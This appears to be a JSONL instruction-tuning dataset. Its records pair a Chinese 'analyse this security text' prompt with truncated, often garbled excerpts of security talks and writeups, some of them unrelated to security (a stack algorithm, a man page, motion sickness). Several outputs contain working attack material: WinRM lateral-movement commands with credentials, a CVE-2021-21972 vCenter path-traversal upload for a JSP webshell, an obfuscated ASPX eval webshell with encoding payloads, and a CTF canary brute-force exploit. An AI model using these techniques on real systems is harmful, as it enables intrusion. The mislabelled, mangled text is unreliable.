dont Tools are advanced, but still don t provide adequate views. Focused on static analysis Focused on static analysis Software armoring makes process diffi lt even more difficult Process for Reverse Engineering Process for Reverse Engineering Process for Reverse Engineering Process for Reverse Engineering Setup an isolated run-time p environment Execution and initial analysis Execution and initial analysis Deobfuscate compressed or packed code code Disassembly / Code-level Analysis Id tif d l l t d Identify and analyze relevant and interesting portions of the program Isolated Analysis Environment Isolated Analysis Environment Isolated Analysis Environment Isolated Analysis Environment Setup an Isolated Runtime p Environment  Virtual machines: VMWare, Xen, KVM,  f f  Need to protect yourself from malicious code  Create a known-good baseline environment Create a known good baseline environment  Quickly allows backtracking if something bad happens Execution and Initial Analysis Execution and Initial Analysis Execution and Initial Analysis Execution and Initial Analysis Goal: Quickly figure out what the program is doing with", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThis document and its content is the property of Airbus Defence and Space. It shall not be communicated to any third party without the owners written consent. All rights reserved. Auditing 6LoWPAN networks using Standard Penetration Testing Tools Adam Reziouk Arnaud Lebrun Jonathan-Christofer Demay 2 Adam Reziouk, Arnaud Lebrun Jonathan-Christofer Demay Auditing 6LoWPAN Networks using Standard Penetration Testing Tools Presentation overview  Why this talk ?  What we will not talk about ?  What we will talk about ? 3 Adam Reziouk, Arnaud Lebrun Jonathan-Christofer Demay Auditing 6LoWPAN Networks using Standard Penetration Testing Tools The 6LoWPAN protocol  IPv6 over Low power Wireless Personal Area Networks  Header compression flags  Addresses factoring (IID or predefined)  Predefined values (e.g., TTL)  Fields omission (when unused)  Use of contexts (index-based)  UDP header compression (ports and checksum)  Packet fragmentation  MTU 127 bytes Vs 1500 bytes  80 bytes of effective payload 4 Adam Reziouk, Arnaud Lebrun Jonathan-Christofer Demay Auditing 6LoWPAN Networks using Standard Penetration Testing Tools  Already a lot of tools to work with IPv6  nmap -6, nc6, ping6, etc.  Nothing new here !  Higher-layer protocols are the same  TCP, UDP, HTTP, etc.  Again, nothing new here !  Why not use a USB adapter ?  That works for Wi-Fi  They are available Whats the big deal ? 5 Adam Reziouk, Arnaud Lebrun Jonathan-Christofer Demay Auditing 6LoWPAN Networks using Standard Penetration Testing Tools The IEEE 802.15.4 standard  PHY layer and MAC sublayer  Multiple possible configurations  Network topology: Star Vs Mesh  Data transfer model: Direct or Indirect, w/or w/o GTS, w/ or w/o Beacons  Multiple security suites  Integrity, confidentiality or both  Integrity/Authentication code size (32, 64 or 128)  Multiple standard revision  2003  2006 and 2011 6 Adam Reziouk, Arnaud Lebrun Jonathan-Christofer Demay Auditing 6LoWPAN Networks using Standard Penetration Testing Tools IE", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nT1028: WinRM for Lateral Movement 参考 内网横移之WinRM Powershell Remoting Lateral Movement  WinRM WinRMWindows Remote Management是WS-Management Protocol Microsoft 实现具体体现为 Win RM 服务) 这个协议有没有其他的实现有比如 openwsman也就说在在linux也可以通过该协议管理 Windows跨平台 Ansible 通过该协议进行远程管理Windows 配置和必要信息 参考Installation and Configuration for Windows Remote Management WinRM 服务在Windows Server 2008 上为自动启动Windows Vista上必须手动启动 默认情况下未配置WinRM listener即使服务在运行也无法接受或发送请求的WS- Management 协议 数据 防火墙阻止访问 快速配置 WinRM Server 该命令执行了以下操作 启动WinRM服务启动类型设置为自动启动 配置HTTPS或HTTPS的发送和接收WS-Management 协议的 listener (所有地址都监听) Windows 防火墙生成放行两个端口并打开HTTP和HTTPS端口 默认 HTTP 端口 5985默认的HTTPS端口是5986 winrm e winrm/config/listener #查找侦听器 winrm get winrm/config #检查配置状态 Winrm quickconfig #启用默认设置 #管理员权限 修改配置中 Client 的 TrustedHosts  可以看到WinRM服务支持多种认证 BasicDigest Kerberos NegotiateCertificate CredSSP 配置中还有一些有意思的地方例如 RootSDDL 指定控制远程访问 listener 的默认安全描述符 AllowRemoteShellAccess 远程shell的访问如果false则服务器拒绝shell的访问 组策略 在域环境中可下发组策略(本地组策略也可以修改相关设置批量部署WinRM服务 winrm set winrm/config/client '@{TrustedHosts=\"*\"}' #powershell下@字符回引起错误 使用引号包围 winrm set winrm/config/client @{TrustedHosts=\"*\"} #cmd #这里信任任意主机实践中请使用确切的列表以保证安全性 #注需clinet和server都配置该选项 对应注册表选项不过多介绍 重要的组件 非完整列表具体请参考About Windows Remote Management WinRM.cmd Winrs.exe winrm.vbs #常用的一些命令 winrm delete winrm/config/listener?address=*+transport=HTTP #删除 listener winrm id -r:OWA2010SP3 -auth:kerberos -u:administrator@0day.org -p:Admin!@#45 winrm get winrm/config -r:OWA2010SP3 -auth:kerberos -u:administrator@0day.org - p:Admin!@#45 cscript %windir%\\System32\\winrm.vbs #和上面一样的使用方法这种cmd下适用 cscript C:\\Windows\\System32\\winrm.vbs #如果系统在C盘是这样 #验证通过可远程修改winRM配置 winrs -r:OWA2010SP3 -u:administrator@0day.org -p:Admin!@#45 ipconfig winrm invoke Create wmicimv2/win32_process '@{CommandLine=\"calc.exe\"}' - r:http://192.168.3.142:5985 -u:administrator@0day.org -p:Admin!@#45 #开启进程 winrm invoke Create wmicimv2/Win32_Service '@{Name=\"test\";DisplayName=\"test\";PathName=\"cmd.exe /k c:\\windows\\system32\\calc.exe\"}' -r:http://192.168.3.142:598", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTrusted Computing, Peer-To-Peer Distribution, and the Economics of Pirated Entertainment Stuart E. Schechter, Rachel A. Greenstadt, and Michael D. Smith Harvard University {stuart,greenie,smith}@eecs.harvard.edu May 16, 2003 Abstract The entertainment industry, facing a formidable threat from peer-to- peer piracy networks, is exploring every possible means to attack these networks. The industry is also employing defensive strategies to protect media and media players from those who would extract and copy their content. These content protection systems depend on the computer indus- trys newly announced trusted computing technologies. While trusted computing technologies may better protect media and media players from content extraction by pirates, we assert that the very same technologies can be employed to better protect pirates and their peer-to-peer distribu- tion networks from the entertainment industry. 1 Introduction The viability of content piracy hinges on the resource costs of and risk from two required steps: extracting content from its protected form and then distributing copies of that content. History demonstrates that advances in technology often reduce these costs. The latest such advance comes in the form of extraction tools and peer-to-peer networks that automate both steps of the piracy process and put them in the hands of the average consumer. In response, the enter- tainment industry is looking to protect their content using trusted computing technologies, which aims to place content extraction technology back outside the reach of the average consumer. We explore the implications of such technologies and argue that history, against the hopes of the entertainment industry, may continue to repeat itself. 1.1 A brief economic history of piracy The cost of pirated goods is a function of the costs of extracting content and distributing copies. We refer to the one-time extraction cost as e (sometimes 1 called the first-copy cost) and the per-copy distrib", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n检测ldap协议以及获取相关字段的种式 JNDI注常rmi和ldap协议去打本主要讲述通过go语检测ldap协议以及获取相关字段的种式 通过跟4ra1n师傅的章的学习和与他本的交流他的检测思路是go语模拟回包然后分析数据包获取其中需要的路径字段因为要确定标是哪个payload效所以获取ldap/rmi请求的路 径是必要的 我在实现他章的思路的时候发现些不理解的地 模拟扫描器打payload fake server 端 我打印出请求路径的hex wireshark抓包 可以看到这个#look的hex跟上fake server端不样但是fake server端的hex转成string后依然是#look 个的实现思路 所以我选择再真正的ldapserver实现次这个检测思路 抓包ldap次连接的数据包 client -> server data : 300c020101600702010304008000 server -> client data: 300c02010161070a010004000400 client -> server data: 30818e0201026481880405236c6f6f6b307f3016040d6a617661436c6173734e616d6531050403666f6f3028040c6a617661436f64654261736531180416687474703a2f2f3132372e302e302e313a363636362f30240 wireshark对数据包进梳理 画个示意图 1 分析到这已经拿到想要的东了这个searchRequest就包含了路径参数所以接下来起个ldap去抓这个searchRequest ldapserver这个库可以直接帮助起个ldap server并且可以构建返回包 所以调ldap.Message.GetSearchRequest()去获取 发包 拿到路径参数 后续作为结果返回的话是要拿到这个结果所以个channel把这个结果装起来于传递 import ( import ( \"fmt\" \"fmt\" ldap \"github.com/vjeantet/ldapserver\" ldap \"github.com/vjeantet/ldapserver\" \"io/ioutil\" \"io/ioutil\" \"log\" \"log\" \"os\" \"os\" \"os/signal\" \"os/signal\" \"syscall\" \"syscall\" )) func main() { func main() { //关闭log //关闭log ldap.Logger = log.New(ioutil.Discard,\"\",0) ldap.Logger = log.New(ioutil.Discard,\"\",0) server := ldap.NewServer() server := ldap.NewServer() routes := ldap.NewRouteMux() routes := ldap.NewRouteMux() routes.Bind(handleBind) routes.Bind(handleBind) routes.Search(handleSearch) routes.Search(handleSearch) server.Handle(routes) server.Handle(routes) go server.ListenAndServe(\"127.0.0.1:9999\") go server.ListenAndServe(\"127.0.0.1:9999\") ch := make(chan os.Signal) ch := make(chan os.Signal) signal.Notify(ch, syscall.SIGINT, syscall.SIGTERM) signal.Notify(ch, syscall.SIGINT, syscall.SIGTERM) <-ch <-ch close(ch) close(ch) server.Stop() server.Stop() }} func handleBind(w ldap.ResponseWriter, m *ldap.Message) { func handleBind(w ldap.ResponseWriter, m *ldap.Message) { res := ldap.NewBindResponse(ldap.LDAPResultSuccess) res := ldap.NewBindResponse(ldap.LDAPResultSuccess) w.Write(res) ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCopyright 2011 Trend Micro Inc. Targeted Malware Attacks Nart Villeneuve Copyright 2011 Trend Micro Inc. Threat Landscape  There are numerous attacks everyday; some are specific and targeted while others are automated and indiscriminate.  Attackers may be highly skilled and well resourced adversaries or simply opportunistic amateurs.  Attackers may be individuals or groups engaging in crime motivated by financial gain, politics or status within their community.  Attackers may be motivated by espionage or data theft and have implicit ties to government or military entities. Copyright 2011 Trend Micro Inc. Presentation  Cybercrime  monetization through credential theft, pay-per-install and pay-per- click within an affiliate organizational structure  Targeted Malware Attacks  use of social engineering to aggressively pursue and compromise specific targets  Blurring Boundaries  use of cybercrime tools and infrastructure for the theft of sensitive information Copyright 2011 Trend Micro Inc. Underground Resources Network  Bulletproof Hosting  Domain Registration  VPNs / Jabber Malware  Builders / Panels  Cryptors / AV test  Exploit Packs Propagation  Spam  BHSEO  TDS  Installs/PPI  All the software and services need to setup a malicious operation are available  Aspiring cybercriminals seek a return on their investment  A variety of monetization strategies are available Copyright 2011 Trend Micro Inc. Credential Theft  Use of tools such as Zeus and SpyEye to steal credentials, credit card numbers etc  Package the goods for re- sale within the underground  Use of money mules and pack mules to extract value Copyright 2011 Trend Micro Inc. Pack Mules Copyright 2011 Trend Micro Inc. CC Marketplace Copyright 2011 Trend Micro Inc. Bank Fraud / SpyEye Webinjects Copyright 2011 Trend Micro Inc. Source: http://www.fbi.gov/news/stories/2010/october/cyber-banking-fraud/cyber-banking-fraud-graphic Copyright 2011 Trend Micro Inc. Arrests: Mega-D, Bredolab, SpyEye Copyright 2011 Trend M", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAm I Being Spied On? Low-tech Ways Of Detecting High-tech Surveillance Dr. Phil @ppolstra http://philpolstra.com What this talk is about  Determining if you are a victim of spying  Video surveillance  Tailing  Audio eavesdropping  Devices embedded in your computer, tablet, or smart phone Why you should care  Government assault on Constitution is well known  Local governments  Competitors  Stalkers  People who just don't like you Video surveillance Common flaw all night vision cameras share Detecting this flaw with any digital camera Other Ways to Detect IR Detecting wireless cameras Free way: Android tablet or smartphone Inexpensive way: BeagleBone based system Moderately expensive way: Detecting signals in licensed bands  Use an Linear Technologies LTC5582 RMS RF power detector  Measure LTC5582 output on volt meter or BeagleBone or ??  Bandpass filters can be used to look at individual frequency bands Moderately Expensive Way Moderately Expensive Way Physical surveillance  Tailing  Common vehicles used  Standard techniques  Stakeout  Common vehicles used  Standard techniques Tailing Vehicles  Non-government spies choose vehicles to blend in  Probably not the red Ferrari behind you  Likely vehicles  Bland colored Honda or Toyota sedan  Bland colored SUV  Whatever is commonly seen in the area  Government spies drive vehicles issued to them  Black SUV  Crown Victoria General Tailing Techniques  Follow distance varies from about 2 cars behind to a block  Bumper beeper may be used to extend follow distance to 0.5  10.0 miles  Tail is generally considered blown if subject has 3 suspicious impressions Single Car Tailing  Generally will be closer than multi-car tails  More likely to follow traffic laws  May use a bumper beeper to help relocate the subject if lost Multi-car Tailing  In most cases everyone is behind the subject  Some cars may be on parallel streets  More likely in urban areas  Tailing vehicles may change relative positions  Vehicles might occasionally appear", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Computer Crime Year In Review: MySpace, MBTA, Boston College and More Jennifer Stisa Granick, EFF Civil Liberties Director Kurt Opsahl, EFF Senior Staff Attorney Marcia Hofmann, EFF Staff Attorney DEFCON 17 July 31, 2009 2 Topics 1. Computer Crime Law Overview 2. MBTA v. Anderson 3. United States v. Lori Drew 4. Calixte/Boston College 5. Lessons and Strategies 3 www.eff.org 4 Coders Rights DRM Fair Use Free Speech Privacy Other Work We Do 5 Computer Fraud and Abuse Act Eight subsections (a-h): (a) Seven (or more) prohibitions (b) Attempt and conspiracy (c) Sentences for criminal violations (d) Secret Service may investigate 6 CFAA (cont) (e) Definitions (f) Law enforcement and intelligence agencies exception (g) Civil cause of action (h) Reporting to Congress 7 CFAA Offenses (a)(1): Espionage prohibitions (a)(2): Obtaining information (c) from a protected computer (used in interstate or foreign commerce or communication) (a)(3): Trespass on government system 8 CFAA Offenses (cont) (a)(4): With intent to defraud (a)(5): Causes damage (a)(6): Password trafficking (a)(7): Threatens a computer 9 Whoever ... accesses without authorization or exceeds authorized accessand thereby obtains-- (A) information from a financial institution, credit card issuer or consumer reporting agency (B) information from any department or agency of the United States; or (C) information from any protected computer Unauthorized Access: 1030(a)(2) 10 Whoever ... knowingly causes the transmission of a program, information, code, or command, and as a result of such conduct, intentionally causes damage without authorization, to a protected computer Causes Damage: 1030(a)(5)(A) 11 MBTA v. Anderson 12 QuickTimeª and a TIFF (Uncompressed) decompressor are needed to see this picture. 13 QuickTimeª and a TIFF (LZW) decompressor are needed to see this picture. QuickTimeª and a TIFF (Uncompressed) decompressor are needed to see this picture. 14 Term paper for Professor Ron Rivest Reverse engineering Ch", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# OpenSSL Heartbleed Vulnerability (CVE-2014-0160) [中文版本(Chinese version)](README.zh-cn.md) The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs). The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users. References: - https://heartbleed.com/ - https://filippo.io/Heartbleed ## Setup Execute following command to start a Nginx server with OpenSSL 1.0.1c: ``` docker compose up -d ``` After the server is started, browse the `https://your-ip:8443` to see the welcome page. > We have encountered an error when running this environment where some AMD architecture CPUs were unable to access the https page successfully. If you have a similar problem, try an Intel CPU instead. ## POC Visit `https://filippo.io/Heartbleed` to check the result: ![](1.png) Run [ssltest.py](ssltest.py) with Python to obtain sensitive data (such as Cookie): ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x00 漏洞描述 CVE-2021-21972 vmware vcenter的一个未授权的命令执行漏洞 该漏洞可以上传一个webshell至vcenter服务器的任意位置然后执行webshell即可 0x01 影响版本 VMware vCenter Server 7.0系列 < 7.0.U1c VMware vCenter Server 6.7系列 < 6.7.U3l VMware vCenter Server 6.5系列 < 6.5 U3n VMware ESXi 7.0系列 < ESXi70U1c-17325551 VMware ESXi 6.7系列 < ESXi670-202102401-SG VMware ESXi 6.5系列 < ESXi650-202102101-SG 测试通过版本 VMware-VCSA-all-6.7.0-8217866 VMware-VIM-all-6.7.0-8217866 2021-02-24 0x02 漏洞利用 1.漏洞判断 直接访问https://ip/ui/vropspluginui/rest/services/updateova 或者https://ip/ui/vropspluginui/rest/services/getstatus 如果404则代表不存在漏洞如果200则代表存在漏洞 2.基本漏洞利用 https://github.com/ptoomey3/evilarc/blob/master/evilarc.py evilarc.py可创建一个zip文件其中包含在其嵌入式路径中带有目录遍历字符的文件 环境搭建参考 https://blog.51cto.com/12218973/2496675VMware vCenter 6.7 如果应用程序或库没有阻止目录遍历字符则可以使用evilarc生成zip文件将其解压缩后将文件放置在目标系统上的任意位置 python evilarc.py -d 2 -p 'testFolder\\' -o win -f winexpl.tar testUpload.txt 该winxpl1.tar包括一个名为的文件..\\..\\testFolder\\testUpload.txt 通过如下POC上传文件这里通过burpsuti抓包将上传的文件winexpl.tar重命名为.ova POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1 Host: vSphereClient.local Connection: close Accept: application/json Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH8GoragzRFVTw1VD Content-Length: 10425 ------WebKitFormBoundaryH8GoragzRFVTw1VD Content-Disposition: form-data; name=\"uploadFile\"; filename=\"a.ova\" Content-Type: text/plain {craftedArchive} ------WebKitFormBoundaryH8GoragzRFVTw1VD-- 可直接上传到C:\\testFolder\\testUpload.txt下 3.Windows上获取RCE 1.需要找打创建文件的可写路径 2.找到的文件路径映射到可访问的Web根目录的文件夹结构中该目录能够运行.jsp脚本并且不需要授权 通过上面上传的testUpload.txt文件属性可知道用于该文件执行的用户是vsphere-ui 并且在windows目录下载默认安装 C:\\ProgramData\\VMware\\vCenterServer\\data\\perfcharts\\tc-instance\\webapps\\statsreport\\该目录含有JSP执行文件权限 无需登录执行访问 根据以上信息可以指定一个tar文件 python evilarc.py -d 5 -p 'ProgramData\\VMware\\vCenterServer\\data\\perfcharts\\tc-instance\\webapps\\statsreport' -o win -f winexpl.tar testRCE.jsp POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1 Host: vSphereClient.local Connection: close Accept: application/json C", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 31. 栈的压入弹出序列 ## 题目链接 [牛客网](https://www.nowcoder.com/practice/d77d11405cc7470d82554cb392585106?tpId=13&tqId=11174&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github) ## 题目描述 输入两个整数序列第一个序列表示栈的压入顺序请判断第二个序列是否为该栈的弹出顺序假设压入栈的所有数字均不相等 例如序列 1,2,3,4,5 是某栈的压入顺序序列 4,5,3,2,1 是该压栈序列对应的一个弹出序列但 4,3,5,1,2 就不可能是该压栈序列的弹出序列 ## 解题思路 使用一个栈来模拟压入弹出操作每次入栈一个元素后都要判断一下栈顶元素是不是当前出栈序列 popSequence 的第一个元素如果是的话则执行出栈操作并将 popSequence 往后移一位继续进行判断 ```java public boolean IsPopOrder(int[] pushSequence, int[] popSequence) { int n = pushSequence.length; Stack<Integer> stack = new Stack<>(); for (int pushIndex = 0, popIndex = 0; pushIndex < n; pushIndex++) { stack.push(pushSequence[pushIndex]); while (popIndex < n && !stack.isEmpty() && stack.peek() == popSequence[popIndex]) { stack.pop(); popIndex++; } } return stack.isEmpty(); } ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nd f h Lord of the Bing Taking Back Search Engine Hacking From Google and Bing Taking Back Search Engine Hacking From Google and Bing 30 July 2010 Presented by: Presented by: Francis Brown and Rob Ragan Stach & Liu, LLC www.stachliu.com A d Agenda O V E R V I E W  Introduction  Advanced Attacks  Google/Bing Hacking Google/Bing Hacking  Other OSINT Attack Techniques  Advanced Defenses  Advanced Defenses  Future Directions 2 G l Goals D E S I R E D O U T C O M E  To understand Google Hacking  Attacks and defenses  Advanced tools and techniques  To think differently about exposures caused by publicly available sources  To blow your mind! 3 Introduction/ B k d Background G E T T I N G U P T O S P E E D 4 O S I t lli Open Source Intelligence S E A R C H I N G P U B L I C S O U R C E S OSINT  is a form of intelligence OSINT is a form of intelligence collection management that involves finding, selecting, and acquiring i f ti f bli l il bl information from publicly available sources and analyzing it to produce actionable intelligence. 5 Q i k Hi t Quick History G O O G L E H A C K I N G R E C A P Dates Event 2004 Google Hacking Database (GHDB) begins g g ( ) g May 2004 Foundstone SiteDigger v1 released 2005 Google Hacking v1 released by Johnny Long J 2005 F d t Sit Di 2 l d Jan. 2005 Foundstone SiteDigger v2 released Feb. 13, 2005 Google Hack Honeypot first release Jan. 10, 2005 MSNPawn v1.0 released Dec. 5, 2006 Google stops issuing Google SOAP API keys   6 Q i k Hi t Quick History G O O G L E H A C K I N G R E C A P Dates Event Mar. 2007 Bing disables inurl: link: and linkdomain: g Nov. 2, 2007 Google Hacking v2 released Mar. 2008 cDc Goolag  gui tool released J 3 2009 Bi li June 3, 2009 Bing goes online Sept. 7, 2009 Google shuts down SOAP Search API Nov. 2009 Binging tool released Dec. 1, 2009 FoundStone SiteDigger v 3.0 released 2010 Googlag.org disappears 7 Th A Threat Areas W H A T Y O U S H O U L D K N O W 8 G l /Bi H ki Google/Bing Hacking S E A R C H E N G I N E A", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nASP/ASPX下的流量混淆 前言 今天谈一谈ASP/ASPX下的流量混淆姿势 以执行 Response.Write(\"yzddmr6\") 为例 不带eval的普通编码方式 Unicode(asp/aspx) 利用iis解析unicode的特性我们可以像sql的bypass一样来用unicode编码绕过 mr6=Response.Write(\"yzddmr6\") 蚁剑中aspx类型shell默认有unicode编码器但是asp中没有可以自己手动添加一份 大小写(asp) asp对于大小写不敏感所以可以对payload中的字符进行大小写变换 mr6=REsponSe.WriTe(\"yzddmr6\") 要注意的是aspx对大小写敏感改变大小写之后会500 添加百分号(asp) 熟悉sql注入bypass的同学应该知道iis+asp允许在每个字符前加一个 % 此处同理 mr6=R%e%sp%o%n%se.w%ri%te(\"yzddmr6\") 带eval的普通编码方式 有eval的情况下无非是找找字符串变换函数来回套娃 ASCII码(asp/aspx) asp下用chr函数+&连接 aspx下用String.fromCharCode+逗号连接 字符拆分(asp/aspx) asp下用 & 连接字符串demo同 chr函数  aspx用 + 或者 concat 函数连接字符串 mr6=eval('Respons'%2B'e.Write(\"yzddmr6\")',\"unsafe\") mr6=eval('Respons'.concat('e.Write(\"yzddmr6\")'),\"unsafe\") mr6=eval(chr(82)%26chr(101)%26chr(115)%26chr(112)%26chr(111)%26chr(110)%26chr(11 5)%26chr(101)%26chr(46)%26chr(87)%26chr(114)%26chr(105)%26chr(116)%26chr(101)%26 chr(40)%26chr(34)%26chr(121)%26chr(122)%26chr(100)%26chr(100)%26chr(109)%26chr(1 14)%26chr(54)%26chr(34)%26chr(41)) mr6=eval(String.fromCharCode(82,101,115,112,111,110,115,101,46,87,114,105,116,10 1,40,34,121,122,100,100,109,114,54,34,41),\"unsafe\") Base64编码(aspx) Url编码(asp) asp 非常规shell下的编码 以上都是针对于基础类型的shell的流量混淆方法如果不在最外层再套娃一次的话还是很容易被识别 这里给出几个demo base64_bypass(aspx) shell 可以按照https://yzddmr6.tk/posts/webshell-venom-aspx/ 这篇文章做一下免杀 base64_bypass编码器 mr6=eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase 64String(\"UmVzcG9uc2UuV3JpdGUoInl6ZGRtcjYiKTs=\")),\"unsafe\"); eval(unescape(\"%25%35%32%25%36%35%25%37%33%25%37%30%25%36%66%25%36%65%25%37%33%2 5%36%35%25%32%65%25%35%37%25%37%32%25%36%39%25%37%34%25%36%35%25%32%38%25%32%32% 25%37%39%25%37%61%25%36%34%25%36%34%25%36%64%25%37%32%25%33%36%25%32%32%25%32%39 \")) <%@ Page Language=\"Jscript\"%> <%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64 String(Request.Item[\"mr6\"])),\"unsafe\");%> // // aspx::base64_bypass 编码模块 // 把所有参数都进行base64编码 // authoryzddmr6 'use strict'; module.exports = (pwd, data, ext = null) => { let randomID", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" -*-Nroff-*- .\\\" .TH UPTIME 1 \"1993年1月26日\" \"Cohesive Systems\" \"Linux User's Manual\" .SH NAME(名称) uptime \\- 告知系统运行了多久时间. .SH SYNOPSIS(总览) .B uptime .br .BR uptime \" [\" \"\\-V\" ] .SH DESCRIPTION(描述) .B uptime 给出下列信息的一行显示. 当前时间, 系统运行了多久时间, 当前登陆的用户有多少, 以及前1,5和15分钟系统的平均负载. .sp 这与通过 .BR w (1) 显示的首行包括的信息相同. .SH FILES(相关文件) .IR /var/run/utmp \" 关于当前谁在登录的信息\" .br .IR /proc \" 进程信息\" .SH AUTHORS(作者) Larry Greenfield <greenfie@gauss.rutgers.edu>和 Michael K. Johnson <johnsonm@sunsite.unc.edu>. 请将bug的报告发到<procps-bugs@redhat.com> .SH \"SEE ALSO\"(另见) .BR ps (1), .BR top (1), .BR utmp (5), .BR w (1) .SH \"[中文版维护人]\" .B riser <boomer@ccidnet.com> .SH \"[中文版最新更新]\" .BR 2001/08/08 .SH \"中国linux论坛man手册页翻译计划:\" .BI http://cmpp.linuxforum.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGood Vibrations: Hacking Motion Sickness on the Cheap INTRODUCTION Motion Sickness  No universally accepted definition  Defined by signs and symptoms, which varies  Agreed that it came about when man first tried to improve natural mobility  Greeks had first recorded account, occurred at sea  Where the term nausea came from  naus- meaning of the sea  -ea being related to sick Statistics  90% of the worlds population suffer from it at one point in their lives  300 million sufferers live in the U.S.  9 to 75 have debilitating response  2 million are forced to visit a doctor Susceptability  Predisposition to motion sickness can be inherited  Some races can be more effected than others Types of Motion Sickness  Car sickness  Air sickness (occurs in an aircraft of some sort)  Sea sickness  Simulation sickness Disproven Theories  Blood and Guts  Result of Respiratory Issues  Reaction to shock to the central and autonomic nervous systems  Infection similar to Cholera and Yellow Fever  Overstimulation FOVEAL SLIP THEORY Overview of Foveal Slip  Fixation disparity leads to lack of visual acuity  Occurs when there is a misalignment of the eye  Can be horizontal and/or vertical  Results in over- or under-convergence of eyes at a fixation point  Misalignment of the fovea is only a few arcminutes  One-sixtieth (1/60) of a degree  Foveal slip eventually leads to depth perception problems Fovea  Located in the center of the Macula region  Oval-shaped, yellow spot  Near the center of the retina  Responsible for central vision  Reading  Driving  Watching tv or movies Foveal Slip and Motion Sickness Its hypothesized that motion sickness that occurs during opti-kinetic stimulation is a result of foveal slip. As a result, an increase of foveal slip more often than not results in an increase of symptoms associated with motion sickness. MOTOR-SENSORY CONFLICT THEORY The Theory States that motion sickness is a defense mechanism against neurotoxins and is triggered when sensory information ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# CanaRy Binary Exploitation, 300 points ## Description: > This time we added a canary to detect buffer overflows. Can you still find a way to retreive the flag from this program? ```c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <wchar.h> #include <locale.h> #define BUF_SIZE 32 #define FLAG_LEN 64 #define KEY_LEN 4 void display_flag() { char buf[FLAG_LEN]; FILE *f = fopen(\"flag.txt\",\"r\"); if (f == NULL) { printf(\"'flag.txt' missing in the current directory!\\n\"); exit(0); } fgets(buf,FLAG_LEN,f); puts(buf); fflush(stdout); } char key[KEY_LEN]; void read_canary() { FILE *f = fopen(\"/problems/canary_6_c4c3b4565f3c8c0c855907b211b63efe/canary.txt\",\"r\"); if (f == NULL) { printf(\"[ERROR]: Trying to Read Canary\\n\"); exit(0); } fread(key,sizeof(char),KEY_LEN,f); fclose(f); } void vuln(){ char canary[KEY_LEN]; char buf[BUF_SIZE]; char user_len[BUF_SIZE]; int count; int x = 0; memcpy(canary,key,KEY_LEN); printf(\"Please enter the length of the entry:\\n> \"); while (x<BUF_SIZE) { read(0,user_len+x,1); if (user_len[x]=='\\n') break; x++; } sscanf(user_len,\"%d\",&count); printf(\"Input> \"); read(0,buf,count); if (memcmp(canary,key,KEY_LEN)) { printf(\"*** Stack Smashing Detected *** : Canary Value Corrupt!\\n\"); exit(-1); } printf(\"Ok... Now Where's the Flag?\\n\"); fflush(stdout); } int main(int argc, char **argv){ setvbuf(stdout, NULL, _IONBF, 0); int i; gid_t gid = getegid(); setresgid(gid, gid, gid); read_canary(); vuln(); return 0; } ``` ## Solution: This challenge is similar to last year's [buffer overflow 3](/2018_picoCTF/buffer%20overflow%203.md). We can brute-force the canary byte-by-byte just like last year. ```python # First, generate a pwntools template using: # pwn template --host 2019shell1.picoctf.com --user dvdalt --path /problems/canary_6_c4c3b4565f3c8c0c855907b211b63efe/vuln #=========================================================== # EXPLOIT GOES HERE #==================================================", "category": "text_analysis", "source": "security_papers"}
